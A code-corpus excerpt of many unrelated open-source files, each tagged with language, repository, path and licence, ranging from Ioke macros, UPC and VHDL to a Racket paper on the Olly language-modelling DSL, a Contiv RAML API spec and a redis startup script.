LexicalBlock createFrom(list(argName, code), call ground) call(self)
self
)
DefaultBehavior FlowControl rap = macro("takes one or more message chains. Will call these on the receiver, then return the receiver",
call arguments each(code,
code evaluateOn(call ground, self))
self
)
DefaultBehavior FlowControl tapping = DefaultBehavior FlowControl cell(:rap)
DefaultBehavior FlowControl sap = dmacro(
[sapCode, iterCode]
result = sapCode evaluateOn(call ground, self)
while(result,
iterCode evaluateOn(call ground, result)
result = sapCode evaluateOn(call ground, self))
self,
[sapCode, argName, iterCode]
destructor = Mixins Enumerable Destructor from(argName)
block = LexicalBlock createFrom(destructor argNames + list(iterCode), call ground)
result = sapCode evaluateOn(call ground, self)
while(result,
block call(*(destructor unpack(result)))
result = sapCode evaluateOn(call ground, self))
self
)
cell(:use) reload = method("will take the same kind of arguments as use, but will make sure that the code will be reloaded every time called.",
filename,
System lowLevelLoad!(filename, true)
)
DefaultBehavior FlowControl dip = dmacro("takes one argument name and one piece of code that will get the receiver as argument and return the result of calling the code",
[argName, code]
LexicalBlock createFrom(list(argName, code), call ground) call(self)
)
| Ioke | 4 | olabini/ioke | src/builtin/O05_misc.ik | [
"ICU",
"MIT"
] |
#Signature file v4.1
#Version 1.36
| Standard ML | 0 | timfel/netbeans | platform/libs.osgi/nbproject/org-netbeans-libs-osgi.sig | [
"Apache-2.0"
] |
# this file and {QtAssistant, QAssistantClient} were copied from the
# Qt 4.6.3 source code, directory "include/QtAssistant". This file
# was modified so that the Q* headers are located in the same
# directory as this file.
SYNCQT.HEADER_FILES = ../../qassistantclient.h ../../qassistantclient_global.h QtAssistant
SYNCQT.HEADER_CLASSES = QAssistantClient
SYNCQT.PRIVATE_HEADER_FILES =
| QMake | 2 | davidlrichmond/macports-ports | devel/qt-assistant/files/headers.pri | [
"BSD-3-Clause"
] |
/*
examples for shared and unshared, global and static data in UPC
Liao, 7/7/2008
*/
/* ---------- unshared data (TLD)--------------------------*/
/*Unshared global variables , with extern */
extern int quux;
/*unshared global variables: scalar, array, w or w/o initializer */
int counter;
int counter2 = 100;
double myarray[10];
double myarray2[5]={0.0, 1.1, 2.2,3.3,4.4};
/*special case: private to shared */
shared[4] int * p2s_p1;
shared[4] int * p2s_p2 = 0;
/*-----------shared data (SSD)-------------------------------
shared scalar, array, initializer
*/
shared int global_counter;
#ifdef ROSE_USE_NEW_EDG_INTERFACE
// DQ (2/17/2011): Remove the initializaion since EDG reports it as an error with EDG 4.0.
shared int global_counter2;
#else
shared int global_counter2 = 2;
#endif
/* shared arrays */
shared[5] double array[100*THREADS];
/* Berkeley UPC compiler does not yet fully implement this. See their bug 36
*/
#ifdef ROSE_USE_NEW_EDG_INTERFACE
// DQ (2/17/2011): Remove the initializaion since EDG reports it as an error with EDG 4.0.
shared[5] double array2[10*THREADS];
#else
shared[5] double array2[10*THREADS]={1.1, 2.2};
#endif
/* shared pointers */
shared int* shared[10] s2s_p4; /*shared to shared */
shared[10] int* shared s2s_p44; /*shared to shared */
shared[5] int* shared[8] s2s_p444; /*shared to shared */
int *shared s2p_p3; /*shared to private */
int *shared[5] s2p_p33; /*shared to private */
int foo()
{
/* -------unshared static data -----------*/
static int counter; /* static scalar */
static int counter2 =0; /* static scalar with initializer */
static double fooArray [2]; /* static array */
static double fooArray2 [2] = {3.1, 1.3}; /* static array */
/* -------shared static data -----------*/
static shared int scounter; /* static shared scalar */
#ifdef ROSE_USE_NEW_EDG_INTERFACE
// DQ (2/17/2011): Remove the initializaion since EDG reports it as an error with EDG 4.0.
static shared int scounter2; /* static shared scalar with initializer */
#else
static shared int scounter2 =0; /* static shared scalar with initializer */
#endif
/*static shared array */
static shared int sfooArray3[5*THREADS];
#ifdef ROSE_USE_NEW_EDG_INTERFACE
// DQ (2/17/2011): Remove the initializaion since EDG reports it as an error with EDG 4.0.
static shared int sfooArray5[5*THREADS];
#else
static shared int sfooArray5[5*THREADS] = {1,2,3,4,5};
#endif
static shared int* p2s_static;
}
int main()
{
int * p1; /* a private pointer to a private variable */
shared int *p2s_p2; /* a private pointer to a shared variable, most useful */
shared[5] int *p2s_p22; /* a private pointer to a shared variable, most useful */
return 0;
}
| Unified Parallel C | 4 | maurizioabba/rose | tests/CompileTests/UPC_tests/shared.upc | [
"BSD-3-Clause"
] |
/**
Copyright 2015 Acacia Team
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package org.acacia.localstore;
import x10.util.HashMap;
import x10.util.HashSet;
public interface AcaciaLocalStore {
public def loadGraph():Boolean;
public def storeGraph():Boolean;
public def getUnderlyingHashMap():HashMap[Long, HashSet[Long]];
public def getOutDegreeDistributionHashMap():HashMap[Long, Long];
public def initialize():void;
public def addVertex(attributes:Rail[Any]):void;
public def addEdge(startVid:Long, endVid:Long):void;
public def getVertexCount():Long;
public def getEdgeCount():Long;
} | X10 | 3 | mdherath/Acacia | src/org/acacia/localstore/AcaciaLocalStore.x10 | [
"Apache-2.0"
] |
CREATE DATABASE `fail_fast`;
| SQL | 0 | WizardXiao/tidb | br/tests/lightning_fail_fast/data/fail_fast-schema-create.sql | [
"Apache-2.0"
] |
package com.baeldung.event.listener;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration;
@Configuration
@ComponentScan(basePackages = "com.baeldung.event.listener")
public class EventConfig {
}
| Java | 4 | DBatOWL/tutorials | spring-core/src/main/java/com/baeldung/event/listener/EventConfig.java | [
"MIT"
] |
header.home=Accueil!
helloMsg=Bonjour, bienvenue dans Ninja Framework! | INI | 1 | DBatOWL/tutorials | ninja/src/main/java/conf/messages_fr.properties | [
"MIT"
] |
"""Scaffold new integration."""
| Python | 0 | domwillcode/home-assistant | script/scaffold/__init__.py | [
"Apache-2.0"
] |
#N canvas 556 43 508 402 12;
#X obj 138 73 inlet~;
#X obj 229 74 inlet~;
#X obj 138 202 outlet~;
#X obj 212 202 outlet~;
#X obj 138 121 +~;
#X obj 211 119 -~;
#X obj 211 143 delwrite~ \$1 \$2;
#X obj 212 172 delread~ \$1 \$2;
#X text 45 20 This appears as an abstraction in patch G08.reverb.pd
;
#X text 34 256 This network makes two copies of the (stereo) input
\, one in phase \, the other out of phase and delayed. The total frequency
response is flat. The total signal power out is exactly twice that
of the input \, no matter what frequencies the input contains. This
is used to increase echo density \, by stacking several of these units
with different delay times. Each stage doubles the echo density.;
#X connect 0 0 4 0;
#X connect 0 0 5 0;
#X connect 1 0 4 1;
#X connect 1 0 5 1;
#X connect 4 0 2 0;
#X connect 5 0 6 0;
#X connect 7 0 3 0;
| Pure Data | 4 | mcclure/pure-data | doc/3.audio.examples/reverb-echo.pd | [
"TCL"
] |
a {
background: url('
}
| Less | 0 | rakacreative/prettier | tests/misc/errors/less/open-sigle-quote.less | [
"MIT"
] |
#lang scribble/base
@(require
"defs.rkt"
"bib.rkt"
scribble/manual
scriblib/footnote
scriblib/figure
scribble-latex-utils/utils)
@title*{Olly - Ott-Like LibrarY}
All the previous extensions are features of existing proof assistants.
In this section we present Olly, a domain-specific language (DSL) for modeling
programming languages, which provides features that no other proof assistant
supports.
Olly provides BNF notation for generating inductive types that represent
programming language syntax.
The BNF notation automatically converts variables in the syntax to de Bruijn
indices.
Olly also supports inference rule notation for modeling relations.
Both notations support extracting the models to LaTeX and Coq, in addition to
using the models directly in Cur.
Olly is inspired by Ott@~citea{sewell:2007}, a tool for generating models of
programming language semantics in different proof assistants from a single
model written in a DSL.
Ott is an external tool that generates files for each proof assistant, while
Olly is integrated into the object language of Cur as a language extension.
@subsubsub*section*{BNF Notation}
We begin with an example of defining of the syntax of the simply-typed
λ-calculus using the @racket[define-language] form.
This language includes booleans, the unit type, pairs, and functions.
Note that the @racket[let] form is the elimination form for pairs in this
language, and binds two names.
@racketblock[
define-language stlc
#:vars (x)
#:output-coq "stlc.v"
#:output-latex "stlc.tex"
val (v) ::= true false unit
type (A B) ::= boolty unitty (-> A B) (* A A)
term (e) ::= x v (lambda (#:bind x : A) e)
(app e e) (cons e e)
(let (#:bind x #:bind x) = e in e)
]
The first argument to the form is a name for the language---@racket[stlc] in
this case.
The next three lines are optional keyword arguments.
The @racket[#:vars] argument is a set of meta-variables that represent variables
in the syntax.
The @racket[#:output-coq] argument is a string representing a file name;
when given, a Coq representation of the language syntax is written to the
specified file during compilation.
Similarly, the @racket[#:output-latex] argument is a string representing a file
name; when given, a Latex rendering of the BNF grammar is written to the
specified file during compilation.
After the optional arguments, @racket[define-language] expects an arbitrary
number of non-terminal definitions from which it generates inductive types.
To better understand @racket[define-language] non-terminal clauses, let us
first look at the code generated for the @racket[term] non-terminal.
@racketblock[
data stlc-term : 0 Type
Nat->stlc-term : {Nat -> stlc-term}
stlc-val->stlc-term : {stlc-value ->
stlc-term}
stlc-lambda : {stlc-type -> stlc-term ->
stlc-term}
stlc-app : {stlc-term -> stlc-term -> stlc-term}
stlc-cons : {stlc-term -> stlc-term ->
stlc-term}
stlc-let : {stlc-term -> stlc-term ->
stlc-term}
]
References to other non-terminals, such as the reference to @racket[x], result
in @emph{conversion constructors} which simply inject one non-terminal into the
other.
The names of the conversion constructors are generated from the types of the
non-terminals with the sigil @racket[->] between them, indicating
conversion.
For example, @racket[Nat->stlc-term] is a @racket[stlc-term]
constructor that converts a @racket[Nat] (representing a de Bruijn index) to a
@racket[stlc-term].
Other constructor names are generated from the name of the language,
@racket[stlc], and the name of the constructor given in the syntax.
For example, the constructor name generated from the @racket[lambda] syntax is
@racket[stlc-lambda].
More formally, the syntax of a non-terminal definition is @racket[(nt-name
(meta-variables ...) ::= syn-clause ...)].
As Cur does not currently support mutual inductive definitions, all
non-terminal definitions must be appear in order of their dependencies.
Each @racket[syn-clause] must be either a reference to a previously defined
non-terminal, a terminal represented by a unique identifier, or an s-expression
whose first element is a unique identifier.
For each non-terminal, we generate a new inductive type.
We generate a constructors for the inductive type for each @racket[syn-clause].
We prefix the name of each inductive type and each constructor by the language name.
For references to previously defined non-terminals, we generate a constructor
that act as a tag and injects the previous non-terminal into the new one.
For terminals, we generate a constructor that take no arguments and whose name
is based on the terminal.
For s-expressions, we create a new constructor whose name is based on
the identifier at the head of the s-expression and whose arguments' types are
computed from the meta-variables that appear in the rest of the s-expression.
We only use the non-meta-variable symbols such as @racket[:]
in the Latex rendering of the BNF grammar.
The syntax @racket[#:bind x] declares @racket[x] to be a binding position, so
it is not treated as an argument.
Since we use de Bruijn indices for binding, binding positions are erased.
The @racket[define-language] form allows us to create the model using BNF
notation, but working with the model requires using the generated constructor
names.
Instead of using the constructors directly, we can write an extension that
parses the @racket[stlc] syntax into the appropriate constructors@note{It
should be possible to generate this parser in the @racket[define-language]
extension, but we have not yet implemented that feature.}.
@Figure-ref{fig:stlc-parse} presents an excerpt of the parser.
The form @racket[begin-stlc] simply calls the metalanguage function
@racket[parse-stlc] with the syntax object @racket[e] and a new hashtable.
The @racket[parse-stlc] function declares each of the constructor names and
syntactic symbols as literals, and loops over the syntax object generating the
constructors that correspond to the @racket[stlc] syntax.
It uses the hashtable to map variable names to de Bruijn indices.
When parsing a @racket[lambda], it shifts each index in the hashtable.
For convenience, the parser accepts the syntax @racket[(e1 e2)] for
application instead of @racket[(app e1 e2)] and @racket[1] for the unit type
instead of @racket[unitty].
@figure["fig:stlc-parse" "Parser for STLC Syntax (excerpt)"
@#reader scribble/comment-reader #:escape-id UNSYNTAX
(RACKETBLOCK0
define-syntax (begin-stlc syn)
syntax-case syn ()
[(_ e) (parse-stlc #'e (make-immutable-hash))]
begin-for-syntax
define (parse-stlc syn d)
syntax-case syn (lambda : prj * ->
let in cons bool
unit true false)
[(lambda (x : t) e)
#`(stlc-lambda
#,(parse-stlc #'t d)
#,(parse-stlc #'e
(dict-set
(dict-shift d)
(syntax->datum #'x)
#`z)))]
[(e1 e2)
#`(stlc-app
#,(parse-stlc #'e1 d)
#,(parse-stlc #'e2 d))]
[(cons e1 e2)
#`(stlc-cons
#,(parse-stlc #'e1 d)
#,(parse-stlc #'e2 d))]
....
[false #'(stlc-val->stlc-term stlc-false)]
[bool #'stlc-boolty]
define (dict-shift d)
for/fold ([d (make-immutable-hash)])
([(k v) (in-dict d)])
dict-set d k #`(s #,v)
)
]
@subsubsub*section*{Inference-rule Notation}
@Figure-ref{fig:has-type} presents an example of using the inference rule
notation.
We use the @racket[define-relation] form to model a type system for
@racket[stlc].
The @racket[define-relation] form takes as its first argument a name for the
new relation applied to the types of its arguments.
This example defines the inductive type @racket[has-type] which relates a list
of @racket[stlc-type]s, an @racket[stlc-term], and an @racket[stlc-type].
Like the @racket[define-language] form, @racket[define-relation] takes optional
arguments for generating Coq and Latex output.
The rest of the form is interpreted as a sequence of inference rules.
Each inference rule is a list of assumptions, followed by a horizontal line
represented by an arbitrary number of hyphens, a name for the rule that will
become the name of the constructor, and a conclusion that must be the relation
applied to its arguments.
@figure["fig:has-type" "STLC Type System Model (excerpt)"
@exact{\vspace{4ex}}
@#reader scribble/comment-reader
(racketblock0
define-relation
(has-type (List stlc-type) stlc-term stlc-type)
#:output-coq "stlc.v"
#:output-latex "stlc.tex"
[(g : (List stlc-type))
------------------------ T-Unit
(has-type g (begin-stlc unit) (begin-stlc 1))]
....
;; Generates:
data has-type : 0 (-> (List stlc-type)
stlc-term
stlc-type
Type)
T-Unit : (forall (g : (List stlc-type))
(has-type
g
(stlc-val->stlc-term stlc-unit)
stlc-unitty))
....
)]
@Figure-ref{fig:define-relation-impl} presents an excerpt of the implementation
for @racket[define-relation].
To implement this form, we use @racket[syntax-parse]@~citea{ryan2012}, but
only present enough of @racket[syntax-parse] to undeerstand the key ideas in
our implementation.
The @racket[syntax-parse] form allows parsing syntax objects rather than merely
pattern matching on them.
The form allows specifying patterns as in @racket[syntax-case], but also
support refining the patterns using syntax classes that specify subpatterns and
side-conditions.
We can apply a syntax class to a pattern variable by using the syntax
@racket[pv:class], or by using the syntax @racket[(~var pv class)].
Both declare the pattern variable @racket[pv] must match the syntax class
@racket[class], but the @racket[~var] syntax is required when the syntax class
takes arguments.
In the definition of @racket[define-relation], we declare that the name of the
relation must be an identifier using the colon syntax and the syntax class
@racket[id].
We declare that the next two arguments are optional using the special form
@racket[~optional], which takes a pattern as its argument.
We specify the pattern is a sequence of the keyword @racket[#:output-coq]
followed by a pattern variable @racket[coq-file].
We use the syntax class @racket[str] to refine the @racket[coq-file] pattern,
indicating that it must be a string literal.
If this optional pattern matches, then the @racket[coq-file] pattern variable
is bound in an attribute map.
The form @racket[attribute] references the attribute map and returns
@racket[false] if the attribute is not bound.
After the optional arguments, we declare a pattern variable @racket[rule] using
the @racket[~var] syntax, refine it using the @racket[inference-rule] syntax
class, and use @racket[...] to match a list of inference rules.
Next we define the syntax class @racket[inference-rule].
The @racket[inference-rule] syntax class takes two arguments: the name of the
relation and the list of indices.
This syntax class matches when the syntax has the pattern of a list of
hypothesis, followed by a horizontal line, a name, and a conclusion.
The rule name must be an identifier.
The syntax class for a horizontal line converts the syntax to a string and uses
a regular expression to match when the string is an arbitrary number of
hyphens.
The syntax class for a conclusion uses the name of the relation and the indices
to ensure the conclusion is the original relation applied to the right number
of arguments.
@figure["fig:define-relation-impl" @elem{Implementation of @racket[define-relation] (excerpt)}
@#reader scribble/comment-reader
(racketblock0
define-syntax (define-relation syn)
syntax-parse syn
[(_ (name:id index ...)
(~optional
(~seq #:output-coq coq-file:str))
(~optional
(~seq #:output-latex latex-file:str))
(~var rule (inference-rule
(attribute name)
(attribute index)))
...)
....]
begin-for-syntax
define-syntax-class horizontal-line
pattern
x:id
#:when (regexp-match?
#rx"-+" (syntax->string #'x))
define-syntax-class (conclusion n args r)
pattern
(name:id arg ...)
#:fail-unless
(equal? (syntax->symbol #'name)
(syntax->symbol #'n))
(format "Rule ~a: conclusion mismatch" r)
....
define-syntax-class (inference-rule name
indices)
pattern (h ...
line:horizontal-line
rule-name:id
(~var t (conclusion
name
indices
(attribute rule-name))))
....
)] | Racket | 5 | bluephoenix47/cic-redex | cur-paper/olly.scrbl | [
"BSD-2-Clause"
] |
public func overloaded() {}
| Swift | 1 | lwhsu/swift | test/attr/Inputs/warn_unqualified_access_other.swift | [
"Apache-2.0"
] |
// MIR for `add` before PreCodegen
fn add() -> u32 {
let mut _0: u32; // return place in scope 0 at $DIR/return_place.rs:5:13: 5:16
bb0: {
_0 = const 4_u32; // scope 0 at $DIR/return_place.rs:6:5: 6:10
return; // scope 0 at $DIR/return_place.rs:7:2: 7:2
}
}
| Mirah | 4 | Eric-Arellano/rust | src/test/mir-opt/const_prop/return_place.add.PreCodegen.before.mir | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
#!/bin/bash
# Redis is one of those servers which by default accept connections from
# everywhere. Luckily, homebrew and presumably debian come with sane defaults.
# However, they're located in different directories.
if [[ $(uname) = 'Darwin' ]]; then
echo "Running redis from Homebrew..."
redis-server /usr/local/etc/redis.conf
fi
if [[ $(uname) = 'Linux' ]]; then
# redis-server package may have redis running by default; don't crash if so
pgrep -lf redis-server
if [ $? -ne 0 ]; then
echo "Running redis"
redis-server /etc/redis/redis.conf
else
echo "Redis already running"
sleep infinity
fi
fi
| Shell | 4 | cnheider/nylas-mail | packages/cloud-core/scripts/run-redis.sh | [
"MIT"
] |
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE GADTs #-}
{-# LANGUAGE KindSignatures #-}
{-# LANGUAGE TypeApplications #-}
module Analysis.Effect.Store
( -- * Store effect
alloc
, (.=)
, fetch
, Store(..)
-- * Re-exports
, Algebra
, Has
, run
) where
import Analysis.Name
import Control.Effect.Labelled
import Data.Kind as K
-- Store effect
alloc :: HasLabelled Store (Store addr val) sig m => Name -> m addr
alloc = sendLabelled @Store . Alloc
(.=) :: HasLabelled Store (Store addr val) sig m => addr -> val -> m ()
addr .= val = sendLabelled @Store $ Assign addr val
infix 2 .=
fetch :: HasLabelled Store (Store addr val) sig m => addr -> m val
fetch = sendLabelled @Store . Fetch
data Store addr val (m :: K.Type -> K.Type) k where
Alloc :: Name -> Store addr val m addr
Assign :: addr -> val -> Store addr val m ()
Fetch :: addr -> Store addr val m val
| Haskell | 4 | tabulon-ext/semantic | semantic-analysis/src/Analysis/Effect/Store.hs | [
"MIT"
] |
"""Tests for the APRS component."""
| Python | 0 | domwillcode/home-assistant | tests/components/aprs/__init__.py | [
"Apache-2.0"
] |
--TEST--
getprotobyname function basic test
--CREDITS--
edgarsandi - <edgar.r.sandi@gmail.com>
--SKIPIF--
<?php
if(in_array(PHP_OS_FAMILY, ['BSD', 'Darwin', 'Solaris', 'Linux'])){
if (!file_exists("/etc/protocols")) die("skip reason: missing /etc/protocols");
}
if (getenv('SKIP_MSAN')) die('skip msan missing interceptor for getprotobyname()');
?>
--FILE--
<?php
var_dump(getprotobyname('tcp'));
?>
--EXPECT--
int(6)
| PHP | 4 | NathanFreeman/php-src | ext/standard/tests/network/getprotobyname_basic.phpt | [
"PHP-3.01"
] |
&::2**\-.@
| Befunge | 0 | SuprDewd/BefungeSimulator | befunge_code/codeforces_130/a.befunge | [
"MIT"
] |
-- ==============================================================
-- RTL generated by Vivado(TM) HLS - High-Level Synthesis from C, C++ and OpenCL
-- Version: 2020.2
-- Copyright (C) 1986-2020 Xilinx, Inc. All Rights Reserved.
--
-- ===========================================================
library IEEE;
use IEEE.std_logic_1164.all;
use IEEE.numeric_std.all;
entity xfExtractPixels is
port (
ap_ready : OUT STD_LOGIC;
tmp_buf_0_V_read : IN STD_LOGIC_VECTOR (9 downto 0);
tmp_buf_1_V_read : IN STD_LOGIC_VECTOR (9 downto 0);
tmp_buf_2_V_read : IN STD_LOGIC_VECTOR (9 downto 0);
tmp_buf_3_V_read : IN STD_LOGIC_VECTOR (9 downto 0);
val1_V_read : IN STD_LOGIC_VECTOR (39 downto 0);
ap_return_0 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_1 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_2 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_3 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_4 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_5 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_6 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_7 : OUT STD_LOGIC_VECTOR (9 downto 0) );
end;
architecture behav of xfExtractPixels is
constant ap_const_logic_1 : STD_LOGIC := '1';
constant ap_const_boolean_1 : BOOLEAN := true;
constant ap_const_lv32_A : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000001010";
constant ap_const_lv32_13 : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000010011";
constant ap_const_lv32_14 : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000010100";
constant ap_const_lv32_1D : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000011101";
constant ap_const_lv32_1E : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000011110";
constant ap_const_lv32_27 : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000100111";
constant ap_const_logic_0 : STD_LOGIC := '0';
signal trunc_ln647_fu_60_p1 : STD_LOGIC_VECTOR (9 downto 0);
begin
ap_ready <= ap_const_logic_1;
ap_return_0 <= tmp_buf_0_V_read;
ap_return_1 <= tmp_buf_1_V_read;
ap_return_2 <= tmp_buf_2_V_read;
ap_return_3 <= tmp_buf_3_V_read;
ap_return_4 <= trunc_ln647_fu_60_p1;
ap_return_5 <= val1_V_read(19 downto 10);
ap_return_6 <= val1_V_read(29 downto 20);
ap_return_7 <= val1_V_read(39 downto 30);
trunc_ln647_fu_60_p1 <= val1_V_read(10 - 1 downto 0);
end behav;
| VHDL | 3 | hito0512/Vitis-AI | Whole-App-Acceleration/apps/resnet50/build_flow/DPUCVDX8G_vck190/vck190_platform/hw/source/ip/isppipeline_accel/hdl/vhdl/xfExtractPixels.vhd | [
"Apache-2.0"
] |
primitive DoNotOptimise
"""
Contains functions preventing some compiler optimisations, namely dead code
removal. This is useful for benchmarking purposes.
"""
fun apply[A](obj: A) =>
"""
Prevent the compiler from optimising out obj and any computation it is
derived from. This doesn't prevent constant propagation.
"""
compile_intrinsic
fun observe() =>
"""
Prevent the compiler from optimising out writes to an object marked by
the apply function.
"""
compile_intrinsic
| Pony | 4 | presidentbeef/ponyc | packages/builtin/do_not_optimise.pony | [
"BSD-2-Clause"
] |
#import <Foundation/NSObject.h>
@protocol ExceptionThrower
-(void)throwException;
@end;
@interface ExceptionThrowerManager : NSObject
+(void)throwExceptionWith:(id<ExceptionThrower>)thrower;
@end;
| C | 4 | Mu-L/kotlin | kotlin-native/backend.native/tests/interop/objc/tests/exceptions.h | [
"ECL-2.0",
"Apache-2.0"
] |
# Copyright 2017-2017 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# Auto-Generated by cargo-ebuild 0.1.4
EAPI=6
CRATES="
bitflags-0.5.0
cbox-0.3.0
gcc-0.3.31
libc-0.2.14
llvm-alt-0.5.0
llvm-sys-0.3.0
semver-0.1.20
"
inherit cargo
DESCRIPTION="A wrapper for LLVM, a powerful library and toolkit for compilers"
HOMEPAGE="https://github.com/TomBebbington/llvm-rs"
SRC_URI="$(cargo_crate_uris ${CRATES})"
RESTRICT="mirror"
LICENSE="bsd-3-clause"
SLOT="0"
KEYWORDS="~amd64"
IUSE=""
DEPEND=""
RDEPEND=""
| Gentoo Ebuild | 4 | gentoo/gentoo-rust | dev-util/llvm-alt/llvm-alt-0.5.0.ebuild | [
"BSD-3-Clause"
] |
#%RAML 1.0
title: Contiv
description: Contiv API Specification
version: v1
baseUri:
value: https://{serverfqdn}:10000/api/{version}
(rediractable): true
baseUriParameters:
serverfqdn:
type: string
protocols: [ HTTPS ]
mediaType: [ application/json ]
resourceTypes:
collection: !include netmaster/schemas/collection.raml
non-upd-collection-item: !include netmaster/schemas/non-upd-collection-item.raml
collection-item: !include netmaster/schemas/collection-item.raml
ro-collection-item: !include netmaster/schemas/ro-collection-item.raml
annotationTypes:
info:
properties:
license:
type: string
enum: [ "Apache 2.0" ]
allowedTargets: API
rediractable: boolean
securitySchemes:
custom_scheme: !include netmaster/schemas/custom-scheme.raml
# Resource templates
uses:
netmaster: netmaster/libraries/netmaster.raml
securedBy: custom_scheme
#Netmaster endpoints. Most of this can be auto-gen
/inspect:
displayName: Inspect
description: Inspect APIs for various Contiv managed objects
/aciGws:
/aciGw:
type: {ro-collection-item: {provider: netmaster}}
/appProfiles:
/{tenantName}:{appProfileName}:
type: {ro-collection-item: {provider: netmaster}}
/Bgps:
/{hostname}:
type: {ro-collection-item: {provider: netmaster}}
/endpoints:
/{endpointID}:
type: {ro-collection-item: {provider: netmaster}}
/endpointGroups:
/{tenantName}:{groupName}:
type: {ro-collection-item: {provider: netmaster}}
/extContractsGroups:
/{tenantName}:{contractsGroupName}:
type: {ro-collection-item: {provider: netmaster}}
/globals:
/global:
type: {ro-collection-item: {provider: netmaster}}
/netprofiles:
/{tenantName}:{profileName}:
type: {ro-collection-item: {provider: netmaster}}
/networks:
/{tenantName}:{networkName}:
type: {ro-collection-item: {provider: netmaster}}
/policys:
/{tenantName}:{policyName}:
type: {ro-collection-item: {provider: netmaster}}
/rules:
/{tenantName}:{policyName}:{ruleId}:
type: {ro-collection-item: {provider: netmaster}}
/serviceLBs:
/{tenantName}:{serviceName}:
type: {ro-collection-item: {provider: netmaster}}
/tenants:
/{tenantName}:
type: {ro-collection-item: {provider: netmaster}}
/aciGws:
type: {collection: {provider: netmaster}}
displayName: ACI Gateways
description: ACI gateway settings
/aciGw:
type: {collection-item: {provider: netmaster}}
put:
/appProfiles:
type: {collection: {provider: netmaster}}
displayName: Application Profiles
/{tenantName}:{appProfileName}:
type: {collection-item: {provider: netmaster}}
put:
/Bgps:
type: {collection: {provider: netmaster}}
displayName: BGP
description: BGP settings
/{hostname}:
type: {collection-item: {provider: netmaster}}
put:
/endpointGroups:
type: {collection: {provider: netmaster}}
displayName: Endpoint Groups
/{tenantName}:{groupName}:
type: {collection-item: {provider: netmaster}}
put:
/extContractsGroups:
type: {collection: {provider: netmaster}}
displayName: External Contract Groups
/{tenantName}:{contractsGroupName}:
type: {collection-item: {provider: netmaster}}
put:
/globals:
type: {collection: {provider: netmaster}}
displayName: Globals
description: Contiv global settings
/global:
type: {collection-item: {provider: netmaster}}
displayName: Global
put:
/netprofiles:
type: {collection: {provider: netmaster}}
displayName: Network Profiles
/{tenantName}:{profileName}:
type: {collection-item: {provider: netmaster}}
put:
/networks:
type: {collection: {provider: netmaster}}
displayName: Networks
/{tenantName}:{networkName}:
type: {collection-item: {provider: netmaster}}
put:
/policys:
type: {collection: {provider: netmaster}}
displayName: Policies
/{tenantName}:{policyName}:
type: {collection-item: {provider: netmaster}}
put:
/rules:
type: {collection: {provider: netmaster}}
displayName: Rules
/{tenantName}:{policyName}:{ruleId}:
type: {collection-item: {provider: netmaster}}
put:
/serviceLBs:
type: {collection: {provider: netmaster}}
displayName: Service Load Balancers
/{tenantName}:{serviceName}:
type: {collection-item: {provider: netmaster}}
put:
/tenants:
type: {collection: {provider: netmaster}}
displayName: Tenants
/{tenantName}:
type: {collection-item: {provider: netmaster}}
put:
| RAML | 3 | sap-ariba/netplugin | contivmodel/spec/netmaster.raml | [
"Apache-2.0"
] |
export function getTypeByValue(value) {
const valueType = typeof value;
switch (valueType) {
case 'number':
if (Number.isNaN(value)) {
return 'NaN';
}
if (!Number.isFinite(value)) {
return 'Infinity';
}
if (value !== Math.floor(value)) {
return 'float';
}
return 'number';
case 'object':
if (value === null) {
return 'null';
}
return value.constructor.name;
default:
return valueType;
}
}
// IE 11 support
function ponyfillIsInteger(x) {
// eslint-disable-next-line no-restricted-globals
return typeof x === 'number' && isFinite(x) && Math.floor(x) === x;
}
const isInteger = Number.isInteger || ponyfillIsInteger;
function requiredInteger(props, propName, componentName, location) {
const propValue = props[propName];
if (propValue == null || !isInteger(propValue)) {
const propType = getTypeByValue(propValue);
return new RangeError(
`Invalid ${location} \`${propName}\` of type \`${propType}\` supplied to \`${componentName}\`, expected \`integer\`.`,
);
}
return null;
}
function validator(props, propName, ...other) {
const propValue = props[propName];
if (propValue === undefined) {
return null;
}
return requiredInteger(props, propName, ...other);
}
function validatorNoop() {
return null;
}
validator.isRequired = requiredInteger;
validatorNoop.isRequired = validatorNoop;
export default process.env.NODE_ENV === 'production' ? validatorNoop : validator;
| JavaScript | 5 | good-gym/material-ui | packages/material-ui-utils/src/integerPropType.js | [
"MIT"
] |
CREATE TABLE t (key STRING, value STRING, ds STRING, hr INT) USING parquet
PARTITIONED BY (ds, hr);
INSERT INTO TABLE t PARTITION (ds='2017-08-01', hr=10)
VALUES ('k1', 100), ('k2', 200), ('k3', 300);
INSERT INTO TABLE t PARTITION (ds='2017-08-01', hr=11)
VALUES ('k1', 101), ('k2', 201), ('k3', 301), ('k4', 401);
INSERT INTO TABLE t PARTITION (ds='2017-09-01', hr=5)
VALUES ('k1', 102), ('k2', 202);
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=10);
-- Collect stats for a single partition
ANALYZE TABLE t PARTITION (ds='2017-08-01', hr=10) COMPUTE STATISTICS;
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=10);
-- Collect stats for 2 partitions
ANALYZE TABLE t PARTITION (ds='2017-08-01') COMPUTE STATISTICS;
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=10);
